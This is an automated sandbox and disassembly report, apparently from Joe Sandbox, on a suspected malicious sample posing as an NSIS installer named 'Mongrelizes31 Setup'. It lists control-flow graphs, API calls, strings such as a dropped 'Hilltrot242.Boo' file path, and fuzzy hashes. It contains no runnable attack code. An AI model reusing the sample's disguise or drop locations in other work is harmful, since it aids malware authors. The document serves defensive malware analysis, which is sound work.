                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Mongrelizes31 Setup: Completed
                                        • API String ID: 3282139019-1023628639
                                        • Opcode ID: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
                                        • Instruction ID: f34c7ad61b4b1b4f5354d92f7eace51acccef8372a8e2d808ca2954a926f6951
                                        • Opcode Fuzzy Hash: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
                                        • Instruction Fuzzy Hash: 65C1B171A04205BBDB216F61ED45E2B7E7CFB45706F40443EF601B11E1C779A942AB2E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 290 40377f-403797 call 4062c7 293 403799-4037a9 call 405e8d 290->293 294 4037ab-4037dc call 405e16 290->294 303 4037ff-403828 call 403a44 call 4059b5 293->303 299 4037f4-4037fa lstrcatA 294->299 300 4037de-4037ef call 405e16 294->300 299->303 300->299 308 40382e-403833 303->308 309 4038af-4038b7 call 4059b5 303->309 308->309 310 403835-403859 call 405e16 308->310 315 4038c5-4038ea LoadImageA 309->315 316 4038b9-4038c0 call 405f51 309->316 310->309 317 40385b-40385d 310->317 319 40396b-403973 call 40140b 315->319 320 4038ec-40391c RegisterClassA 315->320 316->315 321 40386e-40387a lstrlenA 317->321 322 40385f-40386c call 4058f2 317->322 333 403975-403978 319->333 334 40397d-403988 call 403a44 319->334 323 403922-403966 SystemParametersInfoA CreateWindowExA 320->323 324 403a3a 320->324 328 4038a2-4038aa call 4058c7 call 405f2f 321->328 329 40387c-40388a lstrcmpiA 321->329 322->321 323->319 327 403a3c-403a43 324->327 328->309 329->328 332 40388c-403896 GetFileAttributesA 329->332 336 403898-40389a 332->336 337 40389c-40389d call 40590e 332->337 333->327 343 403a11-403a12 call 405128 334->343 344 40398e-4039a8 ShowWindow call 406259 334->344 336->328 336->337 337->328 348 403a17-403a19 343->348 349 4039b4-4039c6 GetClassInfoA 344->349 350 4039aa-4039af call 406259 344->350 351 403a33-403a35 call 40140b 348->351 352 403a1b-403a21 348->352 356 4039c8-4039d8 GetClassInfoA RegisterClassA 349->356 357 4039de-403a01 DialogBoxParamA call 40140b 349->357 350->349 351->324 352->333 353 403a27-403a2e call 40140b 352->353 353->333 356->357 361 403a06-403a0f call 4036cf 357->361 361->327
                                        APIs
                                          • Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                          • Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                        • lstrcatA.KERNEL32(1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\beNxougDFV.exe",00000000), ref: 004037FA
                                        • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Mongrelizes31 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Mongrelizes31 Setup: Completed,00000000,00000002,774D3410), ref: 0040386F
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
                                        • GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
                                          • Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A
                                        • RegisterClassA.USER32(00422EA0), ref: 00403913
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040392B
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403960
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403996
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039C2
                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039CF
                                        • RegisterClassA.USER32(00422EA0), ref: 004039D8
                                        • DialogBoxParamA.USER32(?,00000000,00403B1C,00000000), ref: 004039F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$Control Panel\Desktop\ResourceLocale$Mongrelizes31 Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-2869279803
                                        • Opcode ID: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
                                        • Instruction ID: d12dedd32edb2aff813830401e41f02ecd086126c72271397d80de36ce2b18ee
                                        • Opcode Fuzzy Hash: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
                                        • Instruction Fuzzy Hash: 1E61C6B1744240BEE620BF669D45F373AACEB84759F40447EF940B22E2D77C9D029A2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 364 402d48-402d96 GetTickCount GetModuleFileNameA call 405ac8 367 402da2-402dd0 call 405f2f call 40590e call 405f2f GetFileSize 364->367 368 402d98-402d9d 364->368 376 402dd6 367->376 377 402ebd-402ecb call 402ce4 367->377 369 402f7a-402f7e 368->369 379 402ddb-402df2 376->379 384 402f20-402f25 377->384 385 402ecd-402ed0 377->385 381 402df4 379->381 382 402df6-402dff call 40315d 379->382 381->382 389 402e05-402e0c 382->389 390 402f27-402f2f call 402ce4 382->390 384->369 387 402ed2-402eea call 403173 call 40315d 385->387 388 402ef4-402f1e GlobalAlloc call 403173 call 402f81 385->388 387->384 411 402eec-402ef2 387->411 388->384 415 402f31-402f42 388->415 393 402e88-402e8c 389->393 394 402e0e-402e22 call 405a83 389->394 390->384 398 402e96-402e9c 393->398 399 402e8e-402e95 call 402ce4 393->399 394->398 413 402e24-402e2b 394->413 406 402eab-402eb5 398->406 407 402e9e-402ea8 call 40637e 398->407 399->398 406->379 414 402ebb 406->414 407->406 411->384 411->388 413->398 417 402e2d-402e34 413->417 414->377 418 402f44 415->418 419 402f4a-402f4f 415->419 417->398 420 402e36-402e3d 417->420 418->419 421 402f50-402f56 419->421 420->398 423 402e3f-402e46 420->423 421->421 422 402f58-402f73 SetFilePointer call 405a83 421->422 426 402f78 422->426 423->398 425 402e48-402e68 423->425 425->384 427 402e6e-402e72 425->427 426->369 428 402e74-402e78 427->428 429 402e7a-402e82 427->429 428->414 428->429 429->398 430 402e84-402e86 429->430 430->398
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402D59
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\beNxougDFV.exe,00000400), ref: 00402D75
                                          • Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
                                          • Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\beNxougDFV.exe,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00402DC1
                                        Strings
                                        • C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
                                        • Null, xrefs: 00402E3F
                                        • Inst, xrefs: 00402E2D
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
                                        • "C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00402D48
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20
                                        • C:\Users\user\Desktop\beNxougDFV.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
                                        • soft, xrefs: 00402E36
                                        • Error launching installer, xrefs: 00402D98
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\beNxougDFV.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 4283519449-841657486
                                        • Opcode ID: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
                                        • Instruction ID: ef8309496f7f1060f742aea9483ad6a943d4cc908664d4bedc23fec409a9c2f2
                                        • Opcode Fuzzy Hash: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
                                        • Instruction Fuzzy Hash: F251D5B1A40215ABDF209F65DE89B9E7AB8FB04355F10413BE900B62D1C7BC9E418B9D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 431 405f51-405f5c 432 405f5e-405f6d 431->432 433 405f6f-405f85 431->433 432->433 434 406176-40617a 433->434 435 405f8b-405f96 433->435 436 406180-40618a 434->436 437 405fa8-405fb2 434->437 435->434 438 405f9c-405fa3 435->438 440 406195-406196 436->440 441 40618c-406190 call 405f2f 436->441 437->436 439 405fb8-405fbf 437->439 438->434 442 405fc5-405ff9 439->442 443 406169 439->443 441->440 445 406116-406119 442->445 446 405fff-406009 442->446 447 406173-406175 443->447 448 40616b-406171 443->448 451 406149-40614c 445->451 452 40611b-40611e 445->452 449 406023 446->449 450 40600b-40600f 446->450 447->434 448->434 456 40602a-406031 449->456 450->449 453 406011-406015 450->453 457 40615a-406167 lstrlenA 451->457 458 40614e-406155 call 405f51 451->458 454 406120-40612c call 405e8d 452->454 455 40612e-40613a call 405f2f 452->455 453->449 460 406017-40601b 453->460 469 40613f-406145 454->469 455->469 462 406033-406035 456->462 463 406036-406038 456->463 457->434 458->457 460->449 465 40601d-406021 460->465 462->463 467 406071-406074 463->467 468 40603a-406055 call 405e16 463->468 465->456 470 406084-406087 467->470 471 406076-406082 GetSystemDirectoryA 467->471 477 40605a-40605d 468->477 469->457 473 406147 469->473 475 4060f4-4060f6 470->475 476 406089-406097 GetWindowsDirectoryA 470->476 474 4060f8-4060fb 471->474 478 40610e-406114 call 406199 473->478 474->478 479 4060fd-406101 474->479 475->474 481 406099-4060a3 475->481 476->475 477->479 482 406063-40606c call 405f51 477->482 478->457 479->478 484 406103-406109 lstrcatA 479->484 486 4060a5-4060a8 481->486 487 4060bd-4060d3 SHGetSpecialFolderLocation 481->487 482->474 484->478 486->487 489 4060aa-4060b1 486->489 490 4060f1 487->490 491 4060d5-4060ef SHGetPathFromIDListA CoTaskMemFree 487->491 492 4060b9-4060bb 489->492 490->475 491->474 491->490 492->474 492->487
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040607C
                                        • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,0040508E,Completed,00000000), ref: 0040608F
                                        • SHGetSpecialFolderLocation.SHELL32(0040508E,00000000,?,Completed,00000000,0040508E,Completed,00000000), ref: 004060CB
                                        • SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004060D9
                                        • CoTaskMemFree.OLE32(00000000), ref: 004060E5
                                        • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406109
                                        • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,0040508E,Completed,00000000,00000000,0040E8C0,00000000), ref: 0040615B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                        • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 717251189-905382516
                                        • Opcode ID: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
                                        • Instruction ID: ad9c483c4d11e0ac1e74b91e3c17e9742ad78b5bc63621c1ce792900c2eda604
                                        • Opcode Fuzzy Hash: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
                                        • Instruction Fuzzy Hash: 5361D0B1A00115ABDF209F64CD81BBA7BB4DB45304F15813FEA03BA2D2D27C4962DB5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 562 401759-40177c call 402ac1 call 405934 567 401786-401798 call 405f2f call 4058c7 lstrcatA 562->567 568 40177e-401784 call 405f2f 562->568 573 40179d-4017a3 call 406199 567->573 568->573 578 4017a8-4017ac 573->578 579 4017ae-4017b8 call 406232 578->579 580 4017df-4017e2 578->580 587 4017ca-4017dc 579->587 588 4017ba-4017c8 CompareFileTime 579->588 582 4017e4-4017e5 call 405aa3 580->582 583 4017ea-401806 call 405ac8 580->583 582->583 590 401808-40180b 583->590 591 40187e-4018a7 call 405056 call 402f81 583->591 587->580 588->587 592 401860-40186a call 405056 590->592 593 40180d-40184f call 405f2f * 2 call 405f51 call 405f2f call 40564b 590->593 603 4018a9-4018ad 591->603 604 4018af-4018bb SetFileTime 591->604 605 401873-401879 592->605 593->578 625 401855-401856 593->625 603->604 608 4018c1-4018cc CloseHandle 603->608 604->608 609 40295a 605->609 611 402951-402954 608->611 612 4018d2-4018d5 608->612 613 40295c-402960 609->613 611->609 615 4018d7-4018e8 call 405f51 lstrcatA 612->615 616 4018ea-4018ed call 405f51 612->616 622 4018f2-4022e6 call 40564b 615->622 616->622 622->611 622->613 625->605 627 401858-401859 625->627 627->592
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,00000031), ref: 00401798
                                        • CompareFileTime.KERNEL32(-00000014,?,307,307,00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,00000031), ref: 004017C2
                                          • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                          • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                          • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: 307$C:\Users\user\AppData\Local\unshabbily$open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo
                                        • API String ID: 1941528284-2442137438
                                        • Opcode ID: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
                                        • Instruction ID: 5e97bff851cc073dc2a03fd3a0d2357d8c44b4856d4f0a7a75adeada814ade30
                                        • Opcode Fuzzy Hash: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
                                        • Instruction Fuzzy Hash: 7A41E771A10516BACF107BA5DC86DAF3A78DF45369B20823BF525F11E1C63C8A418E6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 629 405056-40506b 630 405121-405125 629->630 631 405071-405083 629->631 632 405085-405089 call 405f51 631->632 633 40508e-40509a lstrlenA 631->633 632->633 635 4050b7-4050bb 633->635 636 40509c-4050ac lstrlenA 633->636 638 4050ca-4050ce 635->638 639 4050bd-4050c4 SetWindowTextA 635->639 636->630 637 4050ae-4050b2 lstrcatA 636->637 637->635 640 4050d0-405112 SendMessageA * 3 638->640 641 405114-405116 638->641 639->638 640->641 641->630 642 405118-40511b 641->642 642->630
                                        APIs
                                        • lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                        • lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                        • lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                        • SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Completed
                                        • API String ID: 2531174081-3087654605
                                        • Opcode ID: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
                                        • Instruction ID: e673b9bb112aa3472437e231988a5d641118b75a6dbc9ddacfe4bdcedf5bb5e7
                                        • Opcode Fuzzy Hash: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
                                        • Instruction Fuzzy Hash: 49217A71A00508BBDF11DFA5DD80ADFBFA9EB08354F14807AF944A6291C2788A41CFA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 643 40551c-405567 CreateDirectoryA 644 405569-40556b 643->644 645 40556d-40557a GetLastError 643->645 646 405594-405596 644->646 645->646 647 40557c-405590 SetFileSecurityA 645->647 647->644 648 405592 GetLastError 647->648 648->646
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
                                        • GetLastError.KERNEL32 ref: 00405573
                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405588
                                        • GetLastError.KERNEL32 ref: 00405592
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                        • API String ID: 3449924974-1471963312
                                        • Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                        • Instruction ID: 8a370a5fbdfdad71dc8e0bfd81c54348e454926cd11c3a1ff2f48966e6f5c6f5
                                        • Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
                                        • Instruction Fuzzy Hash: D0010871D04259EAEF01DBA1CC447EFBBB9EB04354F00857AD904B6290E378A604CFAA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 649 406259-406279 GetSystemDirectoryA 650 40627b 649->650 651 40627d-40627f 649->651 650->651 652 406281-406289 651->652 653 40628f-406291 651->653 652->653 654 40628b-40628d 652->654 655 406292-4062c4 wsprintfA LoadLibraryExA 653->655 654->655
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
                                        • wsprintfA.USER32 ref: 004062A9
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                        • Instruction ID: 482dcefc063d93e198aa1db7e000bfd15e9281d4181d763578a6ff71fc22a1d9
                                        • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                        • Instruction Fuzzy Hash: EAF0F630A10109AEDF14ABA4DD0DFFB375CAB08304F1405BAB64AE11D2E678E9248B69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
